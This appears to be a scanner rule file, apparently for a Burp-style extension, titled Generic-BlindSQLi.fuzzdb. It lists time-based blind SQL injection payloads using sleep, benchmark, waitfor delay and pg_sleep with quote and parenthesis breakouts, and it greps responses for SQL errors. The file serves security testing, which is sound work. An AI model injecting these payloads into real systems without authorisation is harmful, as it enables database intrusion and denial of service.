[
 {
  "Name": "Generic-BlindSQLi.fuzzdb", 
  "Active": false, 
  "Scanner": 1, 
  "Payloads": [
   "# from wapiti", 
   "sleep(__TIME__)#", 
   "1 or sleep(__TIME__)#", 
   "\" or sleep(__TIME__)#", 
   "' or sleep(__TIME__)#", 
   "\" or sleep(__TIME__)=\"", 
   "' or sleep(__TIME__)='", 
   "1) or sleep(__TIME__)#", 
   "\") or sleep(__TIME__)=\"", 
   "') or sleep(__TIME__)='", 
   "1)) or sleep(__TIME__)#", 
   "\")) or sleep(__TIME__)=\"", 
   "')) or sleep(__TIME__)='", 
   ";waitfor delay '0:0:__TIME__'--", 
   ");waitfor delay '0:0:__TIME__'--", 
   "';waitfor delay '0:0:__TIME__'--", 
   "\";waitfor delay '0:0:__TIME__'--", 
   "');waitfor delay '0:0:__TIME__'--", 
   "\");waitfor delay '0:0:__TIME__'--", 
   "));waitfor delay '0:0:__TIME__'--", 
   "'));waitfor delay '0:0:__TIME__'--", 
   "\"));waitfor delay '0:0:__TIME__'--", 
   "benchmark(10000000,MD5(1))#", 
   "1 or benchmark(10000000,MD5(1))#", 
   "\" or benchmark(10000000,MD5(1))#", 
   "' or benchmark(10000000,MD5(1))#", 
   "1) or benchmark(10000000,MD5(1))#", 
   "\") or benchmark(10000000,MD5(1))#", 
   "') or benchmark(10000000,MD5(1))#", 
   "1)) or benchmark(10000000,MD5(1))#", 
   "\")) or benchmark(10000000,MD5(1))#", 
   "')) or benchmark(10000000,MD5(1))#", 
   "pg_sleep(__TIME__)--", 
   "1 or pg_sleep(__TIME__)--", 
   "\" or pg_sleep(__TIME__)--", 
   "' or pg_sleep(__TIME__)--", 
   "1) or pg_sleep(__TIME__)--", 
   "\") or pg_sleep(__TIME__)--", 
   "') or pg_sleep(__TIME__)--", 
   "1)) or pg_sleep(__TIME__)--", 
   "\")) or pg_sleep(__TIME__)--", 
   "')) or pg_sleep(__TIME__)--"
  ], 
  "Encoder": [], 
  "UrlEncode": false, 
  "CharsToUrlEncode": "", 
  "Grep": [
   "error", 
   "Sql Syntax"
  ], 
  "PayloadResponse": false, 
  "NotResponse": false, 
  "NotCookie": false, 
  "TimeOut": 0, 
  "isTime": false, 
  "CaseSensitive": false, 
  "isReplace": false, 
  "ExcludeHTTP": false, 
  "OnlyHTTP": false, 
  "IsContentType": false, 
  "ContentType": "", 
  "NegativeCT": false, 
  "IsResponseCode": false, 
  "ResponseCode": "", 
  "NegativeRC": false, 
  "MatchType": 1, 
  "RedirType": 0, 
  "MaxRedir": 0, 
  "rCookies": false, 
  "spaceEncode": false, 
  "payloadPosition": 0, 
  "IssueName": "Generic-BlindSQLi.fuzzdb", 
  "IssueSeverity": "Information", 
  "IssueConfidence": "Certain", 
  "IssueDetail": "Generic-BlindSQLi.fuzzdb\n\n<grep>", 
  "RemediationDetail": "", 
  "IssueBackground": "", 
  "RemediationBackground": ""
 }
]